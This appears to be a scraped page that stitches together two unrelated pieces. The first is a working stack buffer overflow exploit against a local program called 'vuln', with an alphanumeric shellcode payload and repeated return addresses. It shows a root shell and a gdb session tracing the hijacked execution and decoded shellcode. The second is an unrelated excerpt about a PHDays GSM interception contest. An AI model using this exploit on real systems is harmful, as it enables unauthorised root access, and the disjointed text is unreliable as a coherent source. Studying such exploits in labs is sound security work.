$./vuln "TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP"$(perl -e 'print "\xd0\xd6\xff\xff"x80')

[buffer addr] 0xffffd6d0: TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP[80 repetitions of the non-printable bytes \xd0\xd6\xff\xff]
sh-4.3#whoami
root
The debugger view:
$gdb -q vuln
(gdb) l
32 char buffer[512];
33
34 printf("[buffer addr] 0x%x %s\n", &buffer, str);
35
36 strcpy(buffer, str);
37
38 return 0;
39 }
40
41
(gdb) b 38
Breakpoint 1 at 0x8048493: file vuln.c, line 38.
(gdb) r "TX-KKKK-KKKK-xjiiP\00%AAAA-9%%%-GJJJP-hhNh-th3%-Q6-5P-yyyZ-yZy6-L6---2-8-P-7KKd-%Kdz-%RkzP-xxxx-GGGx-0AFiP-OOOO-jOwO-iaraP-NN%N-a%%a-q44tP-%SS0-%SL5-7uC%P-FkFF-9pUhP-XXXX-XXXX-PXOFP-AAAj-0w2j-0w-vPPPPPPPPP"$(perl -e 'print "\x70\xd6\xff\xff"x80')

...

Breakpoint 1, foo (str=0xffffda00 "") at vuln.c:38
38 return 0;
(gdb) p &buffer
$1 = (char (*)[512]) 0xffffd670
(gdb) nexti
0x08048499 39 }
(gdb) nexti
0xffffd670 in ?? ()
(gdb) p $esp - $eip
$3 = 528
(gdb) x/60i $eip
=> 0xffffd670: push esp
0xffffd671: pop eax
0xffffd672: sub eax,0x4b4b4b4b
0xffffd677: sub eax,0x4b4b4b4b
0xffffd67c: sub eax,0x69696a78
0xffffd681: push eax
0xffffd682: pop esp
0xffffd683: and eax,0x30303030
0xffffd688: and eax,0x41414141
0xffffd68d: sub eax,0x25252539
0xffffd692: sub eax,0x4a4a4a47
0xffffd697: push eax
0xffffd698: sub eax,0x684e6868
0xffffd69d: sub eax,0x25336874
0xffffd6a2: sub eax,0x352d3651
0xffffd6a7: push eax
0xffffd6a8: sub eax,0x5a797979
0xffffd6ad: sub eax,0x36795a79
0xffffd6b2: sub eax,0x2d2d364c
0xffffd6b7: sub eax,0x2d382d32
0xffffd6bc: push eax
0xffffd6bd: sub eax,0x644b4b37
0xffffd6c2: sub eax,0x7a644b25
0xffffd6c7: sub eax,0x7a6b5225
0xffffd6cc: push eax
0xffffd6cd: sub eax,0x78787878
0xffffd6d2: sub eax,0x78474747
0xffffd6d7: sub eax,0x69464130
0xffffd6dc: push eax
0xffffd6dd: sub eax,0x4f4f4f4f
0xffffd6e2: sub eax,0x4f774f6a
0xffffd6e7: sub eax,0x61726169
0xffffd6ec: push eax
0xffffd6ed: sub eax,0x4e254e4e
0xffffd6f2: sub eax,0x61252561
0xffffd6f7: sub eax,0x74343471
0xffffd6fc: push eax
0xffffd6fd: sub eax,0x30535325
0xffffd702: sub eax,0x354c5325
0xffffd707: sub eax,0x25437537
0xffffd70c: push eax
0xffffd70d: sub eax,0x46466b46
0xffffd712: sub eax,0x68557039
0xffffd717: push eax
0xffffd718: sub eax,0x58585858
0xffffd71d: sub eax,0x58585858
0xffffd722: sub eax,0x464f5850
0xffffd727: push eax
0xffffd728: sub eax,0x6a414141
0xffffd72d: sub eax,0x6a327730
0xffffd732: sub eax,0x762d7730
0xffffd737: push eax
0xffffd738: push eax
0xffffd739: push eax
0xffffd73a: push eax
0xffffd73b: push eax
0xffffd73c: push eax
0xffffd73d: push eax
0xffffd73e: push eax
0xffffd73f: push eax
(gdb)


Source Image: prostheticknowledge.com

The MiTM Mobile Contest: GSM Network Down at PHDays V

Although we have published several research works on cell phone tapping, SMS interception, subscriber tracking, and SIM card cracking, lots of our readers still regard those stories as some kind of magic used only by intelligence agencies. The MiTM Mobile contest was held at PHDays for the first time, and it let the participants realize how easily an attacker can conduct the above-mentioned attacks with only a $10 cell phone and some hacker freeware.

Contest conditions and technologies

You've got a corporate cell phone of a MiTM Mobile network user.
Through the DarkNet you have obtained some information that can be useful:
1) The codes for publes (PHDays game currency – Pseudo rUBLE) are regularly sent to the phone number of the corporation's chief accountant — 10000.
2) The financial director is missing, nobody can get him on the phone for several days, his cell phone is turned off, but he is still getting passwords.
3) You can obtain key information by calling the number 2000, but there is authorization by the caller's number. We also managed to find out the phone number of the director's private secretary — 77777. He must have the access.

more here...................http://blog.ptsecurity.com/2015/07/the-mitm-mobile-contest-gsm-network.html



